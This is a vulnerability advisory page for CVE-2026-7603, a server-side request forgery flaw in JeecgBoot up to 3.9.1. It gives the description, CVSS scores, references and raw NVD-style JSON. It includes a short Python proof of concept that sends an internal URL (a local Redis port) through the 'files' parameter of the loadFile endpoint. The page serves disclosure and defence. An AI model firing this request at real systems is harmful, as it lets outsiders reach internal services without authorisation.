Security Vulnerability Report
CVE-2026-7603 CVSS 6.3 MEDIUM

CVE-2026-7603

Published: 2026-05-02 05:16:02
Last Modified: 2026-05-05 20:16:40

Description

A vulnerability was determined in JeecgBoot up to 3.9.1. Affected is the function checkPathTraversalBatch of the file FileDownloadUtils.jav in the component LoadFile Endpoint. Manipulation of the argument `files` causes server-side request forgery. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The affected component should be upgraded. The vendor confirmed the issue and will provide a fix in the upcoming release.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JeecgBoot <= 3.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-7603: SSRF through the `files` argument of the
# JeecgBoot LoadFile endpoint (checkPathTraversalBatch in FileDownloadUtils,
# per the advisory text above).
import requests


def exploit_ssrf(target_url, internal_url):
    """Send one GET to the LoadFile endpoint with `files` set to *internal_url*.

    :param target_url: Base URL of the JeecgBoot instance under test, scheme
        and host included. The endpoint path is appended by plain string
        concatenation, so a trailing slash here would produce a doubled slash.
    :param internal_url: Value placed in the `files` query parameter -- the
        argument the advisory names as the one not rejected server-side.
    :return: None. The outcome is printed to stdout only; a 200 status is
        reported as a hint, not as proof, since the body is never inspected.
    """
    # Path as shipped in the affected releases; it may differ by version.
    path = "/jeecg-boot/sys/common/loadFile"
    url = target_url + path
    # The entire request is one query parameter; this is the value a request
    # log review or input filter would have to look at.
    query = {"files": internal_url}

    print(f"[*] Sending request to {url} with payload: {query}")
    try:
        resp = requests.get(url, params=query, timeout=10)
    except requests.exceptions.RequestException as err:
        # Transport-level failures (refused, timeout, DNS) end up here.
        print(f"[!] An error occurred: {err}")
        return

    if resp.status_code != 200:
        print(f"[-] Request failed with status code: {resp.status_code}")
        return

    # Only status and body length are reported; confirming SSRF would require
    # inspecting the body or response timing, which this script does not do.
    print("[+] Request successful! Server responded. Check response content for signs of SSRF.")
    print(f"[+] Response Length: {len(resp.text)}")


if __name__ == "__main__":
    # Placeholder target: a local instance.
    target = "http://127.0.0.1:8080"
    # Sample value for `files` from the original PoC (a loopback address/port).
    malicious_payload = "http://127.0.0.1:6379"
    exploit_ssrf(target, malicious_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7603", "sourceIdentifier": "[email protected]", "published": "2026-05-02T05:16:01.570", "lastModified": "2026-05-05T20:16:40.080", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in JeecgBoot up to 3.9.1. Affected by this issue is the function checkPathTraversalBatch of the file FileDownloadUtils.jav of the component LoadFile Endpoint. This manipulation of the argument files causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The affected component should be upgraded. The vendor confirmed the issue and will provide a fix in the upcoming release."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/jeecgboot/JeecgBoot/", "source": "[email protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553", "source": "[email protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/805707", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360560", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360560/cti", "source": "[email 
protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}